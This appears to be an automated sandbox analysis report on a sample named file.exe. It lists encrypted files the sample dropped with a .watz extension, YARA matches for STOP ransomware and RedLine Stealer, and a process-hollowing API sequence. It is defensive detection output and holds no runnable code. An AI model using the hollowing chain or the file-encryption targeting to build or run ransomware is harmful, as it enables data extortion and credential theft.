          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409610265331693.txt entropy: 7.99868159075Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99747122555Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99782996393Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99845939641Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg entropy: 7.99271414313Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99328225691Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000001.db entropy: 7.99836618719Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite entropy: 7.99864145614Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99458323726Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99143950422Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99512514242Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99755476716Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99794598944Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99774710608Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.watz (copy) entropy: 7.99717002002Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.watz (copy) entropy: 7.99614137543Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.watz (copy) entropy: 7.99208782689Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.watz (copy) entropy: 7.99298954288Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.watz (copy) entropy: 7.99235073154Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.watz (copy) entropy: 7.99269312056Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.watz (copy) entropy: 7.99242802017Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.watz (copy) entropy: 7.99811938602Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.watz (copy) entropy: 7.99834022327Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.watz (copy) entropy: 7.99770667282Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.watz (copy) entropy: 7.99821441796Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.watz (copy) entropy: 7.99410053436Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.watz (copy) entropy: 7.9969957012Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.watz (copy) entropy: 7.99794598944Jump to dropped file

          System Summary

          barindex
          Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 11.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 11.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.file.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.file.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.file.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.file.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 11.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 11.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.file.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.file.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.file.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.file.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.file.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.file.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000009.00000002.2418701832.00000000021C3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.2455882872.0000000002183000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000005.00000002.2271495369.0000000002190000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000B.00000002.2502982879.000000000213D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 4616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 6420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 3392, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: file.exe PID: 4856, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_021E0110
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02230110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_02230110
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02330110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_02330110
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401FC00_2_00401FC0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E72200_2_021E7220
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022622C00_2_022622C0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0222E37C0_2_0222E37C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E73930_2_021E7393
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EB0000_2_021EB000
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021FF0300_2_021FF030
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EA0260_2_021EA026
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EB0B00_2_021EB0B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021F00D00_2_021F00D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E30F00_2_021E30F0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E70E00_2_021E70E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E91200_2_021E9120
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0222E1410_2_0222E141
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0220D1A40_2_0220D1A4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EA6990_2_021EA699
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0222B69F0_2_0222B69F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EE6E00_2_021EE6E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EC7600_2_021EC760
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EA79A0_2_021EA79A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0220D7F10_2_0220D7F1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E35200_2_021E3520
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E75200_2_021E7520
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021ECA100_2_021ECA10
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E7A800_2_021E7A80
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021F0B000_2_021F0B00
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E2B600_2_021E2B60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EDBE00_2_021EDBE0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E78800_2_021E7880
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022018D00_2_022018D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021EA9160_2_021EA916
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021FA9300_2_021FA930
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0220E9A30_2_0220E9A3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0220F9B00_2_0220F9B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E89D00_2_021E89D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E59F70_2_021E59F7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E8E600_2_021E8E60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02214E9F0_2_02214E9F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02222D1E0_2_02222D1E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E5DF70_2_021E5DF7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E5DE70_2_021E5DE7
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040D2402_2_0040D240
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00419F902_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040C0702_2_0040C070
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042E0032_2_0042E003
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004080302_2_00408030
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004101602_2_00410160
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004C81132_2_004C8113
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004021C02_2_004021C0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044237E2_2_0044237E
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004084C02_2_004084C0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004344FF2_2_004344FF
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043E5A32_2_0043E5A3
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040A6602_2_0040A660
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041E6902_2_0041E690
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004067402_2_00406740
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004027502_2_00402750
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040A7102_2_0040A710
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004087802_2_00408780
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042C8042_2_0042C804
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004068802_2_00406880
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004349F32_2_004349F3
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004069F32_2_004069F3
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00402B802_2_00402B80
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00406B802_2_00406B80
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044ACFF2_2_0044ACFF
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042CE512_2_0042CE51
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00434E0B2_2_00434E0B
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00406EE02_2_00406EE0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00420F302_2_00420F30
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004050572_2_00405057
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042F0102_2_0042F010
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004070E02_2_004070E0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004391F62_2_004391F6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004352402_2_00435240
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004C93432_2_004C9343
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004054472_2_00405447
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004054572_2_00405457
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004495062_2_00449506
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044B5B12_2_0044B5B1
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004356752_2_00435675
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004096862_2_00409686
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F7302_2_0040F730
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044D7A12_2_0044D7A1
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004819202_2_00481920
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044D9DC2_2_0044D9DC
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00449A712_2_00449A71
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00443B402_2_00443B40
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409CF92_2_00409CF9
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040DD402_2_0040DD40
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00427D6C2_2_00427D6C
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040BDC02_2_0040BDC0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409DFA2_2_00409DFA
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409F762_2_00409F76
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0046BFE02_2_0046BFE0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00449FE32_2_00449FE3
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022372205_2_02237220
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022B22C05_2_022B22C0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0227E37C5_2_0227E37C
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022373935_2_02237393
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223A0265_2_0223A026
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0224F0305_2_0224F030
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223B0005_2_0223B000
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223B0B05_2_0223B0B0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022370E05_2_022370E0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022330F05_2_022330F0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022400D05_2_022400D0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022391205_2_02239120
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0227E1415_2_0227E141
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0225D1A45_2_0225D1A4
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0227B69F5_2_0227B69F
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223A6995_2_0223A699
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223E6E05_2_0223E6E0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223C7605_2_0223C760
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223A79A5_2_0223A79A
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0225D7F15_2_0225D7F1
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022335205_2_02233520
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022375205_2_02237520
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223CA105_2_0223CA10
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02237A805_2_02237A80
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02240B005_2_02240B00
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02232B605_2_02232B60
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223DBE05_2_0223DBE0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022378805_2_02237880
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022518D05_2_022518D0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0224A9305_2_0224A930
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0223A9165_2_0223A916
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0225E9A35_2_0225E9A3
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0225F9B05_2_0225F9B0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022359F75_2_022359F7
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_022389D05_2_022389D0
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02238E605_2_02238E60
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02264E9F5_2_02264E9F
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02272D1E5_2_02272D1E
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02235DE75_2_02235DE7
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02235DF75_2_02235DF7
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023372206_2_02337220
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023B22C06_2_023B22C0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0237E37C6_2_0237E37C
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023373936_2_02337393
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0234F0306_2_0234F030
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233A0266_2_0233A026
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233B0006_2_0233B000
